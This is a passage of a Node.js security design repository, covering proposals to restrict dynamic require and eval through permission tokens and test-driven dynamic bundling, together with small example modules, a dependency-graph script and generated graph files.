 62 |   // requestor -- the `module` value in the scope of the code requesting
 63 |   //      permissions.
 64 |   // callback -- called with the generated permission whether granted or
 65 |   //      not.  This puts the permission in a parameter name making it
 66 |   //      much less likely that an attacker who controls a key to obj[key]
 67 |   //      can steal it.
 68 |   module.mayI = function (requestor, callback) {
 69 |     const id = String(requestor.id);
 70 |     const filename = String(requestor.filename);
 71 |     const permission = Object.create(null);  // Token used for identity
 72 |     // TODO: Needs privileged access to real module cache so a module
 73 |     // can't masquerade as another by mutating the module cache.
 74 |     if (_MODE !== _PERMISSIVE_MODE
 75 |         && requestor === require.cache[filename]
 76 |         && _WHITELIST.has(id)) {
 77 |       _VALID_PERMISSIONS.add(permission);
 78 |       // Typical usage is to request permission once during module load.
 79 |       // Removing from whitelist prevents later bogus requests after
 80 |       // the module is exposed to untrusted inputs.
 81 |       _WHITELIST.delete(id);
 82 |     }
 83 |     return callback(permission);
 84 |   };
 85 | 
 86 |   // permission -- a value received via mayI
 87 |   // sourceToEval -- code to eval.  The code generation callback will
 88 |   //                 expect this exact string as its source.
 89 |   // codeThatEvals -- a callback that will be called in a scope that
 90 |   //                  allows eval of sourceToEval.
 91 |   module.letMeEval = function (permission, sourceToEval, codeThatEvals) {
 92 |     sourceToEval = String(sourceToEval);
 93 |     if (_MODE === _PERMISSIVE_MODE) {
 94 |       return codeThatEvals();
 95 |     }
 96 | 
 97 |     if (!_VALID_PERMISSIONS.has(permission)) {
 98 |       console.warn(...);
 99 |       if (_MODE !== _REPORT_ONLY_MODE) {
100 |         return codeThatEvals();
101 |       }
102 |     }
103 | 
104 |     const countBefore = _EVALABLE_SOURCES.get(sourceToEval) || 0;
105 |     _EVALABLE_SOURCES.set(sourceToEval, countBefore + 1);
106 |     try {
107 |       return codeThatEvals();
108 |     } finally {
109 |       if (countBefore) {
110 |         _EVALABLE_SOURCES.set(sourceToEval, countBefore);
111 |       } else {
112 |         _EVALABLE_SOURCES.delete(sourceToEval);
113 |       }
114 |     }
115 |   };
116 | })();
117 | ```
118 | 
119 | and the `eval` operators would check that their argument is in the global
120 | set.
121 | 
122 | Implicit access to `eval` is possible because reflective operators can
123 | reach `eval`.  As long as we can prevent reflective access to
124 | `evalPermission` we can constrain what can be `eval`ed.  If
125 | `evalPermission` is a function parameter, then only `arguments`
126 | aliases it, so functions that do not mention the special name
127 | `arguments` may safely receive one.  Most functions do not mention
128 | `arguments`.  Before whitelisting a module, a reviewer would be wise
129 | to check for any use of `arguments`, and for any escape of permissions
130 | or `module`.
131 | 
132 | `evalPermission` is an opaque token &mdash; only its reference identity
133 | is significant, so we can check membership in a `WeakSet` without
134 | risk of forgery.
135 | 
136 | This requires API changes to existing modules that dynamically use
137 | `eval`, but the changes should be additive and straightforward.
138 | 
139 | It also allows project teams and security specialists to decide on
140 | a case-by-case basis, which modules really need dynamic `eval`.
141 | 
142 | As with synthetic modules, frozen realms may provide a way to further
143 | restrict what dynamically loaded code can do.  If you're trying to
144 | decide whether to trust a module that dynamically loads code, you have
145 | more ways to justifiably conclude that it's safe if the module loads
146 | into a sandbox restricted to a limited frozen API.
147 | 
148 | [CodeGeneration callbacks]: https://cs.chromium.org/chromium/src/third_party/WebKit/Source/bindings/core/v8/V8Initializer.cpp?rcl=ed08e77a52d977fdb8f4c2a0b27e3d5a73019a57&l=626
149 | [CSP callback]: https://cs.chromium.org/chromium/src/third_party/WebKit/Source/bindings/core/v8/V8Initializer.cpp?rcl=ed08e77a52d977fdb8f4c2a0b27e3d5a73019a57&l=352
150 | 


--------------------------------------------------------------------------------
/chapter-2/bundling.md:
--------------------------------------------------------------------------------
  1 | # Dynamic Bundling
  2 | 
  3 | Consider a simple Node application:
  4 | 
  5 | ```js
  6 | // index.js
  7 | // Example that uses various require(...) use cases.
  8 | 
  9 | let staticLoad = require('./lib/static');
 10 | function dynamicLoad(f, x) {
 11 |   return f('./lib/' + x);
 12 | }
 13 | dynamicLoad(require, Math.random() < 2 ? 'dynamic' : 'bogus');
 14 | exports.lazyLoad = () => require('./lib/lazy');
 15 | 
 16 | // Fallback to alternatives
 17 | require(['./lib/opt1', './lib/opt2'].find(
 18 |     (name) => {
 19 |       try {
 20 |         require.resolve(name);
 21 |         return true;
 22 |       } catch (_) {
 23 |         return false;
 24 |       }
 25 |     }));
 26 | ```
 27 | 
 28 | with some unit tests:
 29 | 
 30 | ```js
 31 | // test/test.js
 32 | 
 33 | var expect = require("chai").expect;
 34 | var app = require("../index");
 35 | 
 36 | describe("My TestSuite", () => {
 37 |   describe("A test", () => {
 38 |     it("A unittest", () => {
 39 |       // Exercise the API
 40 |       app.lazyLoad();
 41 |     });
 42 |   });
 43 | });
 44 | ```
 45 | 
 46 | We hack `updateChildren`, which gets called by `Module._load` for new
 47 | modules and when a module requires a cached module, to dump information
 48 | about loads:
 49 | 
 50 | ```diff
 51 | diff --git a/lib/module.js b/lib/module.js
 52 | index cc8d5097bb..945ab8a4a8 100644
 53 | --- a/lib/module.js
 54 | +++ b/lib/module.js
 55 | @@ -59,8 +59,18 @@ stat.cache = null;
 56 | 
 57 |  function updateChildren(parent, child, scan) {
 58 |    var children = parent && parent.children;
 59 | -  if (children && !(scan && children.includes(child)))
 60 | +  if (children && !(scan && children.includes(child))) {
 61 | +    if (parent.filename && child.id) {
 62 | +      // HACK: rather than require('fs') to write a file out, we
 63 | +      // log to the console.
 64 | +      // We assume the prefix will be removed and the result wrapped in
 65 | +      // a DOT digraph.
 66 | +      console.log(
 67 | +          'REQUIRE_LOG_DOT:    ' + JSON.stringify(parent.filename)
 68 | +          + ' -> ' + JSON.stringify(child.id) + ';');
 69 | +    }
 70 |      children.push(child);
 71 | +  }
 72 |  }
 73 | ```
 74 | 
 75 | Running the tests and extracting the graph ([code][extract-script])
 76 | gives us a rather [hairy dependency graph](example/graphs/full.svg):
 77 | 
 78 | <img title="Files loaded by `npm test`" src="example/graphs/full.svg" width=800 height=100>
 79 | 
 80 | We add an edge from `"./package.json"` to the module's main file.
 81 | Then we filter edges ([code][graph-filter]) to include only those
 82 | reachable from `"./package.json"`.  This lets us distinguish files
 83 | loaded by the test runner and tests from those loaded after control
 84 | has entered an API in a production file.
 85 | 
 86 | The resulting graph is much simpler:
 87 | 
 88 | ![Production Source Files](example/graphs/filtered.svg)
 89 | 
 90 | Note that the production file list includes dynamically and lazily
 91 | loaded files.  It does include `./lib/opt2.js` but not `./lib/opt1.js`.
 92 | The latter file does not exist, so the loop which picks the first
 93 | available alternative tries and finds the former.
 94 | 
 95 | Our production source list should include all the files we need
 96 | in production if
 97 | 
 98 | *  The unit tests `require` the main file
 99 | *  The unit tests have enough coverage to load all modules required
100 |    in production via APIs defined in the main file or in APIs
101 |    transitively loaded from there.
102 | 
103 | It is definitely possible to miss some files.  If the unit test did
104 | not call `app.lazyLoad` then there would be no edge to
105 | `./lib/lazy.js`.  To address this, developers can
106 | 
107 | *  Expand test coverage to exercise code paths that load the
108 |    missing source files.
109 | *  Or add an explicit whitelist like
110 |    ```js
111 |    // production-source-whitelist.js
112 |    require('./index.js');
113 |    require('./lib/lazy.js');
114 |    ```
115 |    and explicitly pass this as the main file to the filter
116 |    instead of defaulting to the one specified in `package.json`.
117 | 
118 | Dynamic analysis is not perfect, but a missing source file is
119 | readily apparent, so this replaces
120 | 
121 | *  hard-to-detect bugs with potentially severe security consequences,
122 | 
123 | with
124 | 
125 | *  easy-to-detect bugs with negligible security consequences.
126 | 
127 | [extract-script]: https://github.com/google/node-sec-roadmap/blob/master/chapter-2/example/make_dep_graph.sh
128 | [graph-filter]: https://github.com/google/node-sec-roadmap/blob/6130b76446ff4efbb276d8128c12e41ea2fffbc9/chapter-2/example/make_dep_graph.sh#L39-L73
129 | 


--------------------------------------------------------------------------------
/chapter-2/dynamism.md:
--------------------------------------------------------------------------------
  1 | # Dynamism when you need it
  2 | 
  3 | ## Background
  4 | 
  5 | Node.js code is composed of CommonJS modules that are linked together
  6 | by the builtin `require` function, or [`import`][import-js] statements
  7 | (used by [TypeScript][import-ts]) that typically transpile to
  8 | `require` (modulo [experimental features][esm]).
  9 | 
 10 | `require` itself calls `Module._load` ([code][Module._load]) to
 11 | resolve and load code.  ["The Node.js Way"][FKS] explains this flow
 12 | well.
 13 | 
 14 | Unlike `import`, `require` is dynamic: a runtime value can specify the
 15 | name of a module to load.  (The EcmaScript committee is considering a
 16 | [dynamic `import` operator][import-op-strawman], but we have
 17 | not included that in this analysis.)
 18 | 
 19 | 
 20 | This dynamism is powerful and flexible and enables varied use cases
 21 | like the following:
 22 | 
 23 | *   Lazy loading.  Waiting to load a dependency until it is definitely needed.
 24 |     ```js
 25 |     const infrequentlyUsedAPI = (function () {
 26 |       const dependency = require('dependency');
 27 |       return function infrequentlyUsedAPI() {
 28 |         // Use dependency
 29 |       };
 30 |     }());
 31 |     ```
 32 | *   Loading plugins based on a configuration object.
 33 |     ```js
 34 |     function Service(config) {
 35 |       (config.plugins || []).forEach(
 36 |           (pluginName) => {
 37 |             require(pluginName).initPlugin(this);
 38 |           });
 39 |     }
 40 |     ```
 41 | *   Falling back to an alternate service provider if the first choice
 42 |     isn't available:
 43 |     ```js
 44 |     const KNOWN_SERVICE_PROVIDERS = ['foo-widget', 'bar-widget'];
 45 |     const serviceProviderName = KNOWN_SERVICE_PROVIDERS.find(
 46 |        (name) => {
 47 |          try {
 48 |            require.resolve(name);
 49 |            return true;
 50 |          } catch (_) {
 51 |            return false;
 52 |          }
 53 |        });
 54 |     const serviceProvider = require(serviceProviderName);
 55 |     ```
 56 | *   Taking advantage of an optional dependency when it is available.
 57 |     ```js
 58 |     let optionalDependency = null;
 59 |     try {
 60 |       optionalDependency = require('optionalDependency');
 61 |     } catch (_) {
 62 |       // Oh well.
 63 |     }
 64 |     ```
 65 | *   Loading a handler for a runtime value based on a naming convention.
 66 |     ```js
 67 |     function handle(request) {
 68 |       const handlerName = request.type + '-handler';  // Documented convention
 69 |       let handler;
 70 |       try {
 71 |         handler = require(handlerName);
 72 |       } catch (e) {
 73 |         throw new Error(
 74 |             'Expected handler ' + handlerName
 75 |             + ' for requests with type ' + request.type);
 76 |       }
 77 |       return handler.handle(request);
 78 |     }
 79 |     ```
 80 | *   Introspecting over module metadata.
 81 |     ```js
 82 |     const version = require('./package.json').version;
 83 |     ```
 84 | 
 85 | During rapid development, [file-system monitors][nodemon] can restart
 86 | a node project when source files change, and the application stitches
 87 | itself together without the complex compiler and build system
 88 | integration that statically compiled languages use to do incremental
 89 | recompilation.
 90 | 
 91 | 
 92 | ## Problem
 93 | 
 94 | Threats: [DEX][] [RCE][] [UIR][]
 95 | 
 96 | The `node_modules` directory does not keep production code separate
 97 | from test code.  If test code can be `require`d in production, then
 98 | an attacker may find it far easier to execute a wide variety of other
 99 | attacks.  See [UIR][] for more details on this.
100 | 
101 | Node applications rely on dynamic uses of `require` and changes that
102 | break any of these use cases would require coordinating large scale
103 | changes to existing code, tools, and development practices threatening
104 | [developer experience][DEX].
105 | 
106 | Requiring developers to pick and choose which source files are
107 | production and which are test would either:
108 | 
109 | *  Require them to scrutinize source files not only for their project
110 |    but also for deep dependencies with which they are unfamiliar
111 |    leading to poor developer experience.
112 | *  Whitelist without scrutiny leading to the original security problem.
113 | *  Lead them to not use available modules to solve problems and instead
114 |    roll their own leading to poor developer experience, and possibly
115 |    [LQC][] problems.
116 | 
117 | We need to ensure that only source code written with production
118 | constraints in mind loads in production without increasing the burden
119 | on developers.
120 | 
121 | When the behavior of code in production is markedly different from that
122 | on a developer's workstation, developers lose confidence that they
123 | can avoid bugs in production by testing locally which may lead
124 | to poor developer experience and lower quality code.
125 | 
126 | 
127 | ## Success Criteria
128 | 
129 | We would have prevented abuse of `require` if:
130 | 
131 | *  Untrusted inputs could not cause `require` to load a
132 |    non-production source file,
133 | *  and/or no non-production source files are reachable by
134 |    `require`,
135 | *  and/or loading a non-production source file has no adverse effect.
136 | 
137 | We would have successfully prevented abuse of `eval`, `new Function`
138 | and related operators if:
139 | 
140 | *  Untrusted inputs cannot reach an `eval` operator,
141 | *  and/or untrusted inputs that reach them cause no adverse effects,
142 | *  and/or security specialists could whitelist uses of `eval` operators
143 |    that are necessary for the functioning of the larger
144 |    system and compatible with the system's security goals.
145 | 
146 | In both cases, converting dynamic operators to static before untrusted
147 | inputs reach the system reduces the attack surface.  Requiring
148 | large-scale changes to existing npm modules or requiring large scale
149 | rewrites of code that uses them compromises [DEX][].
150 | 
151 | 
152 | ## Current practices
153 | 
154 | Some development teams use [webpack][] or similar tools to statically
155 | bundle server-side modules, and provide flexible transpilation
156 | pipelines.  That's a great way to do things, but solving security
157 | problems only for teams with development practices mature enough to
158 | deploy via webpack risks preaching to the choir.
159 | 
160 | Webpack, in its minimal configuration, does not attempt to skip
161 | test files ([code][webpack-experiment]).
162 | Teams with an experienced webpack user can use it to great effect, but
163 | it is not an out-of-the-box solution.
164 | 
165 | Webpacking does not prevent calls to `require(...)` with unintended
166 | arguments, but greatly reduces the chance that they will load
167 | non-production code.  As long as the server process cannot read
168 | JS files other than those in the bundle, then a webpacked server
169 | is safe from [UIR][].  This may not be the case if the production
170 | machine has npm modules globally installed, and the server process
171 | is not running in a [chroot jail][].
172 | 
173 | 
174 | ## A Possible Solution
175 | 
176 | We present one possible solution to demonstrate that tackling this
177 | problem is feasible.
178 | 
179 | If we can compute the entire set of `require`-able sources when
180 | dealing only with inputs from trusted sources, then we can
181 | ensure that the node runtime only loads those sources even when
182 | exposed to untrusted inputs.
183 | 
184 | We propose these changes:
185 | 
186 | *  A two phase approach to prevent abuse of `require`.
187 |    1. Tweaks to the node module loader that make it easy to
188 |       [dynamically bundle](bundling.md) a release candidate.
189 |    2. Tweaks to the node module loader in production to restrict
190 |       code loads based on [source content hashes](source-contents.md)
191 |       from the bundling phase.
192 | *  Two different strategies for preventing abuse of
193 |    [`eval`](what-about-eval.md).
194 |    *  JavaScript idioms that can allow many uses of `eval` to
195 |       [load as modules](synthetic-modules.md) and to bundle as above.
196 |    *  Using JavaScript engine callbacks to
197 |       [allow uses of `eval`](bounded-eval.md) by approved modules.
198 | 
199 | [DEX]: ../chapter-1/threat-DEX.md
200 | [LQC]: ../chapter-1/threat-LQC.md
201 | [RCE]: ../chapter-1/threat-RCE.md
202 | [UIR]: ../chapter-1/threat-UIR.md
203 | [webpack]: https://webpack.js.org/
204 | [Symbol]: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Symbol
205 | [import-js]: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/import
206 | [import-ts]: https://www.typescriptlang.org/docs/handbook/modules.html#import
207 | [Module._load]: https://github.com/nodejs/node/blob/0fdd88a374e23e1dd4a05d93afd5eb0c3b080fd5/lib/module.js#L449
208 | [FKS]: http://fredkschott.com/post/2014/06/require-and-the-module-system/
209 | [esm]: https://nodejs.org/api/esm.html#esm_ecmascript_modules
210 | [nodemon]: https://nodemon.io/
211 | [import-op-strawman]: https://github.com/tc39/proposal-dynamic-import
212 | [chroot jail]: https://help.ubuntu.com/community/BasicChroot
213 | [webpack-experiment]: https://github.com/google/node-sec-roadmap/tree/master/chapter-2/experiments/webpack-compat
214 | 


--------------------------------------------------------------------------------
/chapter-2/example/.gitignore:
--------------------------------------------------------------------------------
1 | node_modules
2 | 


--------------------------------------------------------------------------------
/chapter-2/example/graphs/filtered.dot:
--------------------------------------------------------------------------------
1 | digraph Modules {
2 |     "./package.json" [fillcolor=black,fontcolor=white,style=filled];
3 |     "./index.js" -> "./lib/static.js";
4 |     "./index.js" -> "./lib/dynamic.js";
5 |     "./index.js" -> "./lib/opt2.js";
6 |     "./index.js" -> "./lib/lazy.js";
7 |     "./package.json" -> "./index.js";
8 | }
9 | 


--------------------------------------------------------------------------------
/chapter-2/example/graphs/filtered.svg:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8" standalone="no"?>
 2 | <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
 3 |  "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
 4 | <!-- Generated by graphviz version 2.40.1 (20161225.0304)
 5 |  -->
 6 | <!-- Title: Modules Pages: 1 -->
 7 | <svg width="422pt" height="188pt"
 8 |  viewBox="0.00 0.00 422.14 188.00" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
 9 | <g id="graph0" class="graph" transform="scale(1 1) rotate(0) translate(4 184)">
10 | <title>Modules</title>
11 | <polygon fill="#ffffff" stroke="transparent" points="-4,4 -4,-184 418.1424,-184 418.1424,4 -4,4"/>
12 | <!-- ./package.json -->
13 | <g id="node1" class="node">
14 | <title>./package.json</title>
15 | <ellipse fill="#000000" stroke="#000000" cx="215.1961" cy="-162" rx="50.0912" ry="18"/>
16 | <text text-anchor="middle" x="215.1961" y="-158.3" font-family="Times,serif" font-size="14.00" fill="#ffffff">./package.json</text>
17 | </g>
18 | <!-- ./index.js -->
19 | <g id="node2" class="node">
20 | <title>./index.js</title>
21 | <ellipse fill="none" stroke="#000000" cx="215.1961" cy="-90" rx="35.9954" ry="18"/>
22 | <text text-anchor="middle" x="215.1961" y="-86.3" font-family="Times,serif" font-size="14.00" fill="#000000">./index.js</text>
23 | </g>
24 | <!-- ./package.json&#45;&gt;./index.js -->
25 | <g id="edge5" class="edge">
26 | <title>./package.json&#45;&gt;./index.js</title>
27 | <path fill="none" stroke="#000000" d="M215.1961,-143.8314C215.1961,-136.131 215.1961,-126.9743 215.1961,-118.4166"/>
28 | <polygon fill="#000000" stroke="#000000" points="218.6962,-118.4132 215.1961,-108.4133 211.6962,-118.4133 218.6962,-118.4132"/>
29 | </g>
30 | <!-- ./lib/static.js -->
31 | <g id="node3" class="node">
32 | <title>./lib/static.js</title>
33 | <ellipse fill="none" stroke="#000000" cx="44.1961" cy="-18" rx="44.393" ry="18"/>
34 | <text text-anchor="middle" x="44.1961" y="-14.3" font-family="Times,serif" font-size="14.00" fill="#000000">./lib/static.js</text>
35 | </g>
36 | <!-- ./index.js&#45;&gt;./lib/static.js -->
37 | <g id="edge1" class="edge">
38 | <title>./index.js&#45;&gt;./lib/static.js</title>
39 | <path fill="none" stroke="#000000" d="M187.722,-78.432C159.8298,-66.6879 116.3384,-48.3757 84.537,-34.9857"/>
40 | <polygon fill="#000000" stroke="#000000" points="85.6477,-31.6558 75.0731,-31.0009 82.9313,-38.1072 85.6477,-31.6558"/>
41 | </g>
42 | <!-- ./lib/dynamic.js -->
43 | <g id="node4" class="node">
44 | <title>./lib/dynamic.js</title>
45 | <ellipse fill="none" stroke="#000000" cx="159.1961" cy="-18" rx="53.0913" ry="18"/>
46 | <text text-anchor="middle" x="159.1961" y="-14.3" font-family="Times,serif" font-size="14.00" fill="#000000">./lib/dynamic.js</text>
47 | </g>
48 | <!-- ./index.js&#45;&gt;./lib/dynamic.js -->
49 | <g id="edge2" class="edge">
50 | <title>./index.js&#45;&gt;./lib/dynamic.js</title>
51 | <path fill="none" stroke="#000000" d="M201.9249,-72.937C195.1206,-64.1886 186.694,-53.3545 179.1271,-43.6256"/>
52 | <polygon fill="#000000" stroke="#000000" points="181.6632,-41.1854 172.761,-35.4407 176.1378,-45.483 181.6632,-41.1854"/>
53 | </g>
54 | <!-- ./lib/opt2.js -->
55 | <g id="node5" class="node">
56 | <title>./lib/opt2.js</title>
57 | <ellipse fill="none" stroke="#000000" cx="272.1961" cy="-18" rx="41.6928" ry="18"/>
58 | <text text-anchor="middle" x="272.1961" y="-14.3" font-family="Times,serif" font-size="14.00" fill="#000000">./lib/opt2.js</text>
59 | </g>
60 | <!-- ./index.js&#45;&gt;./lib/opt2.js -->
61 | <g id="edge3" class="edge">
62 | <title>./index.js&#45;&gt;./lib/opt2.js</title>
63 | <path fill="none" stroke="#000000" d="M228.7043,-72.937C235.7,-64.1003 244.3806,-53.1354 252.1423,-43.3311"/>
64 | <polygon fill="#000000" stroke="#000000" points="254.926,-45.4536 258.3889,-35.4407 249.4376,-41.1087 254.926,-45.4536"/>
65 | </g>
66 | <!-- ./lib/lazy.js -->
67 | <g id="node6" class="node">
68 | <title>./lib/lazy.js</title>
69 | <ellipse fill="none" stroke="#000000" cx="373.1961" cy="-18" rx="40.8928" ry="18"/>
70 | <text text-anchor="middle" x="373.1961" y="-14.3" font-family="Times,serif" font-size="14.00" fill="#000000">./lib/lazy.js</text>
71 | </g>
72 | <!-- ./index.js&#45;&gt;./lib/lazy.js -->
73 | <g id="edge4" class="edge">
74 | <title>./index.js&#45;&gt;./lib/lazy.js</title>
75 | <path fill="none" stroke="#000000" d="M241.9986,-77.7862C267.6274,-66.1072 306.5225,-48.3829 335.3146,-35.2624"/>
76 | <polygon fill="#000000" stroke="#000000" points="337.0095,-38.3364 344.6578,-31.0048 334.1067,-31.9666 337.0095,-38.3364"/>
77 | </g>
78 | </g>
79 | </svg>
80 | 


--------------------------------------------------------------------------------
/chapter-2/example/index.js:
--------------------------------------------------------------------------------
 1 | /**
 2 |  * @license
 3 |  * Copyright 2017 Google LLC
 4 |  *
 5 |  * Licensed under the Apache License, Version 2.0 (the "License");
 6 |  * you may not use this file except in compliance with the License.
 7 |  * You may obtain a copy of the License at
 8 |  *
 9 |  *     https://www.apache.org/licenses/LICENSE-2.0
10 |  *
11 |  * Unless required by applicable law or agreed to in writing, software
12 |  * distributed under the License is distributed on an "AS IS" BASIS,
13 |  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 |  * See the License for the specific language governing permissions and
15 |  * limitations under the License.
16 |  */
17 | 
18 | // index.js
19 | // Example that tests various kinds of loads.
20 | 
// Static load: the module specifier is a string literal.
let staticLoad = require('./lib/static');
/**
 * Calls the loader `f` with a path built at runtime by appending `x`
 * to './lib/'.
 *
 * @param {function(string): *} f a require-like function.
 * @param {string} x suffix appended to './lib/'.
 * @return {*} whatever `f` returns for the concatenated path.
 */
function dynamicLoad(f, x) {
  return f('./lib/' + x);
}
// Dynamic load: `require` is passed as a value and the specifier is
// computed.  Math.random() is always < 2, so 'dynamic' is always chosen
// and 'bogus' is never requested.
dynamicLoad(require, Math.random() < 2 ? 'dynamic' : 'bogus');
// Lazy load: ./lib/lazy is only required when a caller invokes lazyLoad().
exports.lazyLoad = () => require('./lib/lazy');

// Fallback to alternatives: require the first candidate for which
// require.resolve() does not throw.  If no candidate resolves, find()
// returns undefined and that value is what gets passed to require().
require(['./lib/opt1', './lib/opt2'].find(
    (name) => {
      try {
        require.resolve(name);
        return true;
      } catch (_) {
        // require.resolve threw, so treat this candidate as unavailable.
        return false;
      }
    }));
38 | 


--------------------------------------------------------------------------------
/chapter-2/example/lib/dynamic.js:
--------------------------------------------------------------------------------
 1 | /**
 2 |  * @license
 3 |  * Copyright 2017 Google LLC
 4 |  *
 5 |  * Licensed under the Apache License, Version 2.0 (the "License");
 6 |  * you may not use this file except in compliance with the License.
 7 |  * You may obtain a copy of the License at
 8 |  *
 9 |  *     https://www.apache.org/licenses/LICENSE-2.0
10 |  *
11 |  * Unless required by applicable law or agreed to in writing, software
12 |  * distributed under the License is distributed on an "AS IS" BASIS,
13 |  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 |  * See the License for the specific language governing permissions and
15 |  * limitations under the License.
16 |  */
17 | 
18 | // lib/dynamic.js
19 | 
20 | exports.x = 'dynamic';
21 | 


--------------------------------------------------------------------------------
/chapter-2/example/lib/lazy.js:
--------------------------------------------------------------------------------
 1 | /**
 2 |  * @license
 3 |  * Copyright 2017 Google LLC
 4 |  *
 5 |  * Licensed under the Apache License, Version 2.0 (the "License");
 6 |  * you may not use this file except in compliance with the License.
 7 |  * You may obtain a copy of the License at
 8 |  *
 9 |  *     https://www.apache.org/licenses/LICENSE-2.0
10 |  *
11 |  * Unless required by applicable law or agreed to in writing, software
12 |  * distributed under the License is distributed on an "AS IS" BASIS,
13 |  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 |  * See the License for the specific language governing permissions and
15 |  * limitations under the License.
16 |  */
17 | 
18 | // lib/lazy.js
19 | 
20 | exports.x = 'lazy';
21 | 


--------------------------------------------------------------------------------
/chapter-2/example/lib/opt2.js:
--------------------------------------------------------------------------------
 1 | /**
 2 |  * @license
 3 |  * Copyright 2017 Google LLC
 4 |  *
 5 |  * Licensed under the Apache License, Version 2.0 (the "License");
 6 |  * you may not use this file except in compliance with the License.
 7 |  * You may obtain a copy of the License at
 8 |  *
 9 |  *     https://www.apache.org/licenses/LICENSE-2.0
10 |  *
11 |  * Unless required by applicable law or agreed to in writing, software
12 |  * distributed under the License is distributed on an "AS IS" BASIS,
13 |  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 |  * See the License for the specific language governing permissions and
15 |  * limitations under the License.
16 |  */
17 | 
18 | // lib/opt2.js
19 | 
20 | exports.x = 'opt2';
21 | 


--------------------------------------------------------------------------------
/chapter-2/example/lib/static.js:
--------------------------------------------------------------------------------
 1 | /**
 2 |  * @license
 3 |  * Copyright 2017 Google LLC
 4 |  *
 5 |  * Licensed under the Apache License, Version 2.0 (the "License");
 6 |  * you may not use this file except in compliance with the License.
 7 |  * You may obtain a copy of the License at
 8 |  *
 9 |  *     https://www.apache.org/licenses/LICENSE-2.0
10 |  *
11 |  * Unless required by applicable law or agreed to in writing, software
12 |  * distributed under the License is distributed on an "AS IS" BASIS,
13 |  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 |  * See the License for the specific language governing permissions and
15 |  * limitations under the License.
16 |  */
17 | 
18 | // lib/static.js
19 | 
20 | exports.x = 'static';
21 | 


--------------------------------------------------------------------------------
/chapter-2/example/make_dep_graph.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | # Copyright 2017 Google LLC
 4 | #
 5 | # Licensed under the Apache License, Version 2.0 (the "License");
 6 | # you may not use this file except in compliance with the License.
 7 | # You may obtain a copy of the License at
 8 | #
 9 | #     https://www.apache.org/licenses/LICENSE-2.0
10 | #
11 | # Unless required by applicable law or agreed to in writing, software
12 | # distributed under the License is distributed on an "AS IS" BASIS,
13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | # See the License for the specific language governing permissions and
15 | # limitations under the License.
16 | 
set -e

cd "$(dirname "$0")"

# Directory holding the node build with the hacked Module._load that
# emits REQUIRE_LOG_DOT: lines.  Set NODE_BUILD_DIR to point at a build
# elsewhere; the default keeps the location this script always used.
NODE_BUILD_DIR="${NODE_BUILD_DIR:-/Users/msamuel/work/node/out/Release}"

mkdir -p graphs
(
    echo 'digraph Modules {'

    # Run the tests and filter the logs for log entries from our
    # hacked Module._load.
    # Also relativize source file paths.
    # Lines without the REQUIRE_LOG_DOT: prefix are forwarded to stderr
    # so that ordinary test output stays out of the dot file.
    NODE="$NODE_BUILD_DIR/node" \
    PATH="$NODE_BUILD_DIR/:$PATH" \
    ./node_modules/.bin/mocha 2>&1 \
    | perl -ne 's/"$ENV{PWD}/"./g; if (s/^REQUIRE_LOG_DOT://) { print $_; } else { print STDERR $_; }'

    # Add an edge from package.json to the main module.
    echo '    "./package.json" -> "./index.js";'
    echo '    "./package.json" [fillcolor=black,fontcolor=white,style=filled];'
    echo '}'
) > graphs/full.dot
38 | 
39 | python -c '
import re
import sys

# NOTE: this program is passed to the interpreter inside a single-quoted
# shell string, so it must not contain any single-quote characters.

# Matches one edge line of the form:    "src" -> "tgt";
EDGE_RE = re.compile(r"""^ *(\"(?:[^\"\\]|\\.)*\") -> (\"(?:[^\"\\]|\\.)*\");$""")
# Matches the closing brace of the digraph.
GRAPH_END_RE = re.compile(r"^ *\}")
# The node from which reachability is computed.
ROOT = "\"./package.json\""


def reachable_from(edges, root):
  """Return the sorted list of nodes reachable from root.

  edges maps a source node to the list of its target nodes.  The walk is
  iterative so that long dependency chains cannot hit the recursion limit.
  """
  seen = set()
  pending = [root]
  while pending:
    src = pending.pop()
    if src in seen:
      continue
    seen.add(src)
    pending.extend(edges.get(src, ()))
  return sorted(seen)


def filter_graph(lines):
  """Yield the lines of a dot file, keeping only edges reachable from ROOT.

  Edge lines are held back as they are read.  When the closing brace is
  seen, the edges whose source is reachable from ROOT are emitted just
  before it.  Every other line is passed through unchanged.
  """
  edges = {}
  for line in lines:
    edge_match = EDGE_RE.match(line)
    if edge_match is not None:
      edges.setdefault(edge_match.group(1), []).append(edge_match.group(2))
      continue
    if GRAPH_END_RE.match(line):
      for src in reachable_from(edges, ROOT):
        for tgt in edges.get(src, ()):
          yield "    %s -> %s;\n" % (src, tgt)
    yield line


# True under "python -c", so the filter runs when invoked from the script.
# Writing through sys.stdout works on both Python 2 and Python 3, unlike
# the print statement.
if __name__ == "__main__":
  sys.stdout.writelines(filter_graph(sys.stdin))
73 | ' < graphs/full.dot > graphs/filtered.dot
74 | 
75 | for graph in full filtered; do
76 |     dot -Tsvg graphs/"$graph".dot > graphs/"$graph".svg
77 | done
78 | 
79 | # Start walking from package.json
80 | 
81 | 


--------------------------------------------------------------------------------
/chapter-2/example/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "name": "dynamism-example",
 3 |     "private": true,
 4 |     "description": "Example code that shows dynamically walking the test graph",
 5 |     "main": "index.js",
 6 |     "scripts": {
 7 |         "test": "echo $NODE; ./node_modules/.bin/mocha"
 8 |     },
 9 |     "author": "Mike Samuel",
10 |     "license": "Apache-2.0",
11 |     "devDependencies": {
12 |         "chai": ">=4.1.2",
13 |         "mocha": ">=4.0.1"
14 |     }
15 | }
16 | 


--------------------------------------------------------------------------------
/chapter-2/example/test/test.js:
--------------------------------------------------------------------------------
 1 | /**
 2 |  * @license
